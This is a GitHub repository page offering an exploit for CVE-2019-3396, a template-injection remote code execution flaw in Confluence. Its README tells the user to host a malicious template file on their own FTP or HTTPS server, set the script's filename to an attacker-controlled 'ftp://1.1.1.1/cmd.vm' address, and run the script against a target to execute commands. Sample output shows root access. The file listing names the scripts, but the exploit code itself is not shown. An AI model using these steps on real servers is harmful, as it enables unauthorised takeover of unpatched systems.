Skip to content
CVE-2019-3396 confluence SSTI RCE
Branch: master
Clone or download
Yt1g3r fix ssl error
fix ssl error
Latest commit 5ff3a9f Apr 11, 2019
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
RCE_exp.py fix ssl error Apr 12, 2019
README.md Update README.md Apr 10, 2019
cmd.vm Create cmd.vm Apr 10, 2019

README.md

CVE-2019-3396_EXP

CVE-2019-3396 confluence SSTI RCE

1、put the cmd.vm on your website (must use ftp or https ,http doesn't work )
2、modify RCE_exp.py ,change the filename = 'ftp://1.1.1.1/cmd.vm' (python -m pyftpdlib -p 21)
3、python REC_exp.py http://test.wiki_test.cc:8080 "whoami"

$ python REC_exp.py http://test.wiki_test.cc:8080 "id"
uid=0(root) gid=0(root) groups=0(root)

You can’t perform that action at this time.